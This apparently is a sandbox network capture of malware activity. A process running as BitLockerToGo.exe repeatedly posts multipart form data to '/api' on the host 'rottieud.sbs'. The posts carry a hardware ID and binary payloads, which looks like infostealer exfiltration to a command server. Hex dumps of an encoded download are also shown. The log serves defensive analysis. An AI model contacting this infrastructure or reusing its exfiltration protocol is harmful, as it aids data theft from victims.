                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 37 35 49 44 6e 62 69 35 54 52 57 55 77 63 49 49 72 77 78 66 46 6f 49 6f 62 72 58 53 6e 70 30 6d 30 4d 63 74 54 37 71 68 30 75 50 71 69 55 79 6e 39 61 77 4d 44 39 54 42 78 45 4c 34 52 6c 4d 65 6a 43 31 6c 75 70 48 59 31 6a 50 49 6c 58 4d 43 6e 4c 62 45 34 65 69 56 44 59 2b 2f 76 55 51 56 6e 63 33 42 42 36 63 43 47 31 58 50 4b 58 62 31 79 70 44 38 4c 4d 4f 4c 66 78 69 5a 35 4e 32 71 2f 39 38 4a 6b 66 58 72 41 68 4b 56 77 73 6b 47 72 67 68 66 46 34 6b 67 59 37 71 55 32 74 30 6d 77 6f 39 39 44 70 53 76 7a 65 54 6a 6b 67 71 62 75 62 4a 48 56 74 71 47 7a 78 72 67 58 68 73 31 69 43 31 38 39 36 66 54 30 79 2f 50 6b 54 55 51 31 37 32 43 34 2b 72 66 56 74 32 37 74 6b 30 45 6c 64 54 4e 44 4c 49 4b 58 68 32 43 4c 57 43 31 6c 39 66 51 4c 38 36 41 64 67 65 64 70 63 7a
                                                                          Data Ascii: 75IDnbi5TRWUwcIIrwxfFoIobrXSnp0m0MctT7qh0uPqiUyn9awMD9TBxEL4RlMejC1lupHY1jPIlXMCnLbE4eiVDY+/vUQVnc3BB6cCG1XPKXb1ypD8LMOLfxiZ5N2q/98JkfXrAhKVwskGrghfF4kgY7qU2t0mwo99DpSvzeTjkgqbubJHVtqGzxrgXhs1iC1896fT0y/PkTUQ172C4+rfVt27tk0EldTNDLIKXh2CLWC1l9fQL86Adgedpcz
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 74 32 35 75 6b 49 64 6e 73 4c 49 42 61 30 44 57 42 79 4d 49 32 6d 2f 6e 4e 66 5a 4c 63 47 4b 63 77 2b 65 6f 4d 66 32 34 35 59 43 6b 66 58 39 41 68 47 4d 68 70 42 43 6a 77 46 4e 47 4b 41 74 66 37 7a 53 7a 35 4d 34 69 49 42 35 54 38 48 6b 78 65 48 75 6c 41 69 56 74 61 46 48 47 4a 2f 48 77 67 53 68 43 31 63 64 6a 79 39 75 73 35 37 51 32 69 62 61 6c 58 41 4a 69 36 36 43 71 71 61 59 46 74 33 74 38 33 51 47 67 39 66 65 51 4a 55 46 56 52 57 49 4f 43 36 71 33 4d 6d 64 4a 73 54 48 4c 55 2b 53 70 4d 37 6a 37 70 6b 4b 6c 62 71 38 53 77 53 56 79 73 59 51 70 77 5a 53 46 59 41 69 5a 37 69 56 33 64 59 72 78 59 4e 79 44 74 6e 71 67 75 50 2b 33 31 62 64 67 36 4e 50 47 72 72 4e 78 41 76 67 47 52 55 43 7a 79 6c 69 39 63 71 51 32 53 33 41 6a 58 6f 47 6b 36 37 4e 37 65 61 58
                                                                          Data Ascii: t25ukIdnsLIBa0DWByMI2m/nNfZLcGKcw+eoMf245YCkfX9AhGMhpBCjwFNGKAtf7zSz5M4iIB5T8HkxeHulAiVtaFHGJ/HwgShC1cdjy9us57Q2ibalXAJi66CqqaYFt3t83QGg9feQJUFVRWIOC6q3MmdJsTHLU+SpM7j7pkKlbq8SwSVysYQpwZSFYAiZ7iV3dYrxYNyDtnqguP+31bdg6NPGrrNxAvgGRUCzyli9cqQ2S3AjXoGk67N7eaX
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 4e 46 44 74 53 65 69 43 32 48 4d 78 6b 36 74 57 35 78 2b 34 75 51 32 69 32 49 33 7a 55 44 6d 71 6a 4b 36 2b 43 57 41 70 65 38 75 45 34 64 6b 4d 72 42 42 36 59 48 58 68 36 4f 4b 6d 4b 2f 6c 4e 50 65 4c 73 65 49 66 55 2f 58 35 4d 58 38 70 73 64 4f 75 4b 4b 34 54 42 44 55 32 59 59 62 34 41 46 58 57 39 64 75 59 72 79 55 31 74 67 74 79 59 46 39 43 70 47 67 77 2b 4c 67 6e 41 47 5a 73 4c 4a 4e 45 70 6a 49 77 67 4f 68 43 6c 41 55 68 43 73 75 2b 39 4c 58 78 57 47 51 78 30 51 4d 6a 37 50 53 36 4b 61 41 51 49 54 31 74 45 35 57 7a 49 62 4a 45 4b 6f 4d 56 52 36 41 4b 32 32 36 6c 64 33 62 4c 63 4b 4f 66 51 6d 57 72 64 44 6e 36 70 45 4a 6b 37 6d 39 54 78 79 58 79 34 68 4d 34 41 46 44 57 39 64 75 51 72 4b 66 2f 74 59 74 7a 38 64 71 51 59 44 6b 78 65 69 6d 78 30 36 52 76
                                                                          Data Ascii: NFDtSeiC2HMxk6tW5x+4uQ2i2I3zUDmqjK6+CWApe8uE4dkMrBB6YHXh6OKmK/lNPeLseIfU/X5MX8psdOuKK4TBDU2YYb4AFXW9duYryU1tgtyYF9CpGgw+LgnAGZsLJNEpjIwgOhClAUhCsu+9LXxWGQx0QMj7PS6KaAQIT1tE5WzIbJEKoMVR6AK226ld3bLcKOfQmWrdDn6pEJk7m9TxyXy4hM4AFDW9duQrKf/tYtz8dqQYDkxeimx06Rv
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 45 78 59 6f 7a 74 67 56 4e 45 49 49 69 4c 71 72 63 79 5a 30 6d 78 4d 63 74 54 35 2b 72 79 2b 66 70 6e 67 65 52 75 4c 5a 4c 45 35 58 41 7a 41 69 71 42 6c 30 64 6a 69 74 6b 74 70 50 61 31 43 62 41 67 48 59 64 32 65 71 43 34 2f 37 66 56 74 32 63 74 46 41 59 68 49 62 58 54 4c 6c 47 58 42 66 50 64 69 36 78 6d 4e 2f 5a 4a 73 53 42 63 41 6d 55 70 63 33 6c 35 70 41 4b 6c 72 79 31 51 78 75 52 79 38 77 51 71 67 31 55 46 34 59 69 59 2f 58 63 6b 4e 6f 35 69 4e 38 31 50 70 53 71 7a 4f 50 77 33 78 48 54 72 50 4e 46 47 74 53 65 69 41 4f 73 43 56 67 55 6a 43 31 76 76 34 44 43 30 53 6a 41 67 6e 6b 45 6c 36 4c 51 34 75 6d 57 44 5a 36 38 74 45 6f 61 6e 73 58 50 51 75 35 47 58 41 50 50 64 69 36 57 68 63 44 51 59 64 66 4a 62 45 2b 65 71 49 4b 38 70 70 63 44 6c 62 2b 33 52 52
                                                                          Data Ascii: ExYoztgVNEIIiLqrcyZ0mxMctT5+ry+fpngeRuLZLE5XAzAiqBl0djitktpPa1CbAgHYd2eqC4/7fVt2ctFAYhIbXTLlGXBfPdi6xmN/ZJsSBcAmUpc3l5pAKlry1QxuRy8wQqg1UF4YiY/XckNo5iN81PpSqzOPw3xHTrPNFGtSeiAOsCVgUjC1vv4DC0SjAgnkEl6LQ4umWDZ68tEoansXPQu5GXAPPdi6WhcDQYdfJbE+eqIK8ppcDlb+3RR
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 41 61 41 43 58 78 79 4b 4c 57 4b 2b 6c 64 50 53 4a 63 47 4a 66 41 44 5a 36 6f 4c 6a 2f 74 39 57 33 5a 53 6f 51 52 71 5a 68 74 64 4d 75 55 5a 63 46 38 39 32 4c 72 6d 63 31 64 30 72 7a 6f 4e 77 43 5a 4f 68 77 75 2f 6c 6b 41 71 62 73 62 78 43 48 5a 33 48 7a 67 65 71 44 56 30 57 6a 43 68 6f 39 64 79 51 32 6a 6d 49 33 7a 55 76 67 71 6e 4f 34 36 61 41 51 49 54 31 74 45 35 57 7a 49 62 44 44 71 51 42 57 78 61 4d 4a 6d 75 78 6d 4e 58 64 4b 64 71 50 64 51 69 4c 74 73 4c 74 34 35 4d 4e 6e 62 47 31 53 78 43 58 77 6f 68 4d 34 41 46 44 57 39 64 75 51 37 6d 56 2b 64 6f 36 69 4a 67 37 46 74 6d 6a 7a 71 53 2b 33 77 2b 57 76 37 78 50 46 5a 4c 46 77 77 65 71 42 31 77 54 67 6a 78 74 75 70 33 55 33 53 37 4f 67 58 51 41 6e 36 50 4c 35 65 36 59 54 74 50 31 74 46 70 57 7a 49 62
                                                                          Data Ascii: AaACXxyKLWK+ldPSJcGJfADZ6oLj/t9W3ZSoQRqZhtdMuUZcF892Lrmc1d0rzoNwCZOhwu/lkAqbsbxCHZ3HzgeqDV0WjCho9dyQ2jmI3zUvgqnO46aAQIT1tE5WzIbDDqQBWxaMJmuxmNXdKdqPdQiLtsLt45MNnbG1SxCXwohM4AFDW9duQ7mV+do6iJg7FtmjzqS+3w+Wv7xPFZLFwweqB1wTgjxtup3U3S7OgXQAn6PL5e6YTtP1tFpWzIb
                                                                          2024-11-10 08:27:21 UTC339INData Raw: 52 74 56 7a 79 45 75 37 61 75 51 31 43 62 54 6c 6d 4d 43 69 61 4f 43 32 36 6a 66 46 74 33 74 38 33 63 56 6d 73 6a 50 46 4c 46 4c 66 41 32 46 4b 58 36 79 68 64 2b 64 62 34 69 42 4e 56 66 4b 36 6f 4c 67 39 39 39 57 7a 65 66 6f 46 30 58 44 6c 70 6f 64 37 68 38 62 44 63 39 32 50 50 76 53 77 70 31 35 69 4d 42 32 48 59 75 69 77 66 4c 6c 32 44 43 6a 6b 71 6c 50 45 49 50 58 39 6a 79 6e 48 46 59 64 6d 44 38 69 6f 4a 48 65 30 79 62 65 78 7a 74 50 6c 75 53 61 33 61 62 58 54 71 4c 37 38 31 70 57 7a 49 62 39 41 61 34 49 58 41 32 65 59 30 6d 76 6e 39 62 4b 4d 49 6a 4a 4e 51 6e 5a 2f 4a 4b 71 70 70 73 66 33 65 33 6a 45 45 33 42 6c 5a 39 53 38 68 6b 56 41 73 38 34 4c 75 33 41 6e 70 30 7a 69 4e 38 31 53 4a 71 32 30 4f 4c 6c 69 51 33 61 69 34 31 73 45 5a 4c 44 7a 78 4c 69
                                                                          Data Ascii: RtVzyEu7auQ1CbTlmMCiaOC26jfFt3t83cVmsjPFLFLfA2FKX6yhd+db4iBNVfK6oLg999WzefoF0XDlpod7h8bDc92PPvSwp15iMB2HYuiwfLl2DCjkqlPEIPX9jynHFYdmD8ioJHe0ybexztPluSa3abXTqL781pWzIb9Aa4IXA2eY0mvn9bKMIjJNQnZ/JKqppsf3e3jEE3BlZ9S8hkVAs84Lu3Anp0ziN81SJq20OLliQ3ai41sEZLDzxLi
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 32 32 31 64 0d 0a 64 4d 75 55 5a 4e 57 39 64 38 49 50 57 41 6b 49 56 68 6a 34 52 6e 48 5a 2b 6e 31 4f 65 68 6f 54 43 65 6f 37 35 4e 48 5a 58 34 39 69 79 74 42 31 67 56 7a 52 39 34 75 49 4c 54 32 43 62 32 75 58 73 49 6a 61 50 4d 34 75 62 66 51 4e 32 36 38 78 6f 76 31 49 36 49 50 65 35 47 51 31 76 58 62 6c 75 32 6e 4e 37 61 4e 39 6e 4b 56 68 6d 55 71 38 6e 6c 70 74 46 4f 6d 2f 58 72 45 6c 6a 55 77 74 6c 43 2b 46 59 4a 51 4e 70 39 4f 65 58 41 7a 35 4d 34 69 4a 45 31 56 38 76 71 67 76 61 6d 78 30 37 61 75 37 35 44 46 5a 72 46 32 68 43 6d 42 55 30 59 79 42 42 51 6c 4a 2f 62 30 53 7a 48 6a 45 73 78 75 4b 6e 4a 36 4f 75 51 42 61 4f 4c 70 6b 45 59 6d 73 48 65 45 2b 42 49 47 78 54 50 64 6c 66 31 32 70 44 69 62 34 69 66 4e 56 66 5a 6b 63 48 71 36 4a 67 59 6a 50 69
                                                                          Data Ascii: 221ddMuUZNW9d8IPWAkIVhj4RnHZ+n1OehoTCeo75NHZX49iytB1gVzR94uILT2Cb2uXsIjaPM4ubfQN268xov1I6IPe5GQ1vXblu2nN7aN9nKVhmUq8nlptFOm/XrEljUwtlC+FYJQNp9OeXAz5M4iJE1V8vqgvamx07au75DFZrF2hCmBU0YyBBQlJ/b0SzHjEsxuKnJ6OuQBaOLpkEYmsHeE+BIGxTPdlf12pDib4ifNVfZkcHq6JgYjPi
                                                                          2024-11-10 08:27:21 UTC1369INData Raw: 6f 61 51 51 75 63 46 53 51 6d 4a 4c 58 69 32 31 65 37 6a 42 4e 2b 45 5a 51 6d 61 6d 76 7a 50 36 70 6b 4a 68 37 4b 31 5a 44 62 55 69 49 67 4e 34 46 35 69 57 38 64 75 55 66 76 53 79 4a 31 35 69 4c 4a 32 41 5a 65 6a 31 50 57 72 75 68 6d 65 70 62 56 42 56 74 71 47 7a 6b 4c 34 56 68 56 62 69 7a 38 75 37 63 4b 43 68 6e 53 62 30 43 56 64 68 75 72 62 70 50 44 66 56 73 2f 37 38 31 42 57 7a 49 61 50 41 62 49 55 58 52 69 5a 4c 53 6d 4c 72 50 62 65 4d 4d 4b 6d 65 42 2b 65 6d 76 7a 78 35 5a 45 41 6d 71 4f 69 41 6c 6a 55 79 59 68 61 6d 55 59 54 56 34 6b 74 65 50 57 74 6e 70 30 35 69 4e 38 31 4f 70 71 71 7a 4f 50 77 6a 6b 4f 37 74 71 4a 49 4e 35 6e 57 7a 30 4c 75 52 6c 31 62 31 33 30 67 39 5a 62 42 6e 58 6d 59 31 53 35 61 79 76 4f 53 74 76 6e 52 46 39 32 6a 38 78 70 45
                                                                          Data Ascii: oaQQucFSQmJLXi21e7jBN+EZQmamvzP6pkJh7K1ZDbUiIgN4F5iW8duUfvSyJ15iLJ2AZej1PWruhmepbVBVtqGzkL4VhVbiz8u7cKChnSb0CVdhurbpPDfVs/781BWzIaPAbIUXRiZLSmLrPbeMMKmeB+emvzx5ZEAmqOiAljUyYhamUYTV4ktePWtnp05iN81OpqqzOPwjkO7tqJIN5nWz0LuRl1b130g9ZbBnXmY1S5ayvOStvnRF92j8xpE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.462520104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:22 UTC274OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=7VW3YXLZA66F9E
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 18139
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:22 UTC15331OUTData Raw: 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a
                                                                          Data Ascii: --7VW3YXLZA66F9EContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--7VW3YXLZA66F9EContent-Disposition: form-data; name="pid"2--7VW3YXLZA66F9EContent-Disposition: form-data; name="lid"eSaxAu--webex--7VW3YXLZ
                                                                          2024-11-10 08:27:22 UTC2808OUTData Raw: 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d ae
                                                                          Data Ascii: ntFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?lMmi=
                                                                          2024-11-10 08:27:23 UTC1015INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=84i51dda407da5k9nnllhd1chs; expires=Thu, 06-Mar-2025 02:14:02 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2FkNV%2B9DHrIR7TAV%2FlTn1mA4b%2F5Bb8TNApSPydk4JtJrXIz8uAOXTXSxlD45wc2Qt%2BwiZqWyNwj6FyICdgJXyB8e6qIFicxApPVUP5i32Y5vSDSCNEl%2BHTlK6oCya8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9bc78ea6b31-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2826&recv_bytes=19093&delivery_rate=2350649&cwnd=247&unsent_bytes=0&cid=d62835fbc6cbc4ea&ts=666&x=0"
                                                                          2024-11-10 08:27:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.72
                                                                          2024-11-10 08:27:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.462521104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:24 UTC278OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=MZVX4FV38R3YLXIAE5Q
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8790
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:24 UTC8790OUTData Raw: 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65
                                                                          Data Ascii: --MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="pid"2--MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="lid"eSaxAu--we
                                                                          2024-11-10 08:27:24 UTC1007INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=g9g752jdt9asfhr18gjmolvmn3; expires=Thu, 06-Mar-2025 02:14:03 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5po%2FnSnrS%2FPodfOAqTkx3xRlhes7rqSyRfYGZ67fcwiGnexdCpu70gMuSBGEEcTZKzF5G9kNNcMfXQCtNVuSA%2F7OJGQcaytrQMTTzmJ2EEFAse2wAaslWSBvRJBBbo%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9c4cf1e6c81-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2827&recv_bytes=9726&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=a6c2a422f6119a28&ts=530&x=0"
                                                                          2024-11-10 08:27:24 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.72
                                                                          2024-11-10 08:27:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.462522104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:25 UTC274OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=9XOYRA8F42FOFM
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 20413
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:25 UTC15331OUTData Raw: 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 39 58 4f 59 52 41 38 46
                                                                          Data Ascii: --9XOYRA8F42FOFMContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--9XOYRA8F42FOFMContent-Disposition: form-data; name="pid"3--9XOYRA8F42FOFMContent-Disposition: form-data; name="lid"eSaxAu--webex--9XOYRA8F
                                                                          2024-11-10 08:27:25 UTC5082OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: lrQMn 64F6(X&7~`aO
                                                                          2024-11-10 08:27:26 UTC1013INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=4p0si31jjmkdc2t74se6e86gbh; expires=Thu, 06-Mar-2025 02:14:04 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9syz0amV%2Bk1xXEyG2xw%2B%2Fn%2BtH80jnvpEfzimWTRXOKS2nu8Hl2dAdEk99xtXEqZFe2sEVqiNqOsMgCBKnkS8HPooZVZMxUMRgvJRlf8GdccMXm0p%2FHGTSt6Oeyfne8%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9cd5c3d6bd4-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2828&recv_bytes=21367&delivery_rate=2311252&cwnd=251&unsent_bytes=0&cid=2bbc50e4d76ae6ac&ts=569&x=0"
                                                                          2024-11-10 08:27:26 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.72
                                                                          2024-11-10 08:27:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.462523104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:27 UTC274OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=OPDDOUELN5HDDDX
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 1236
                                                                          Host: rottieud.sbs
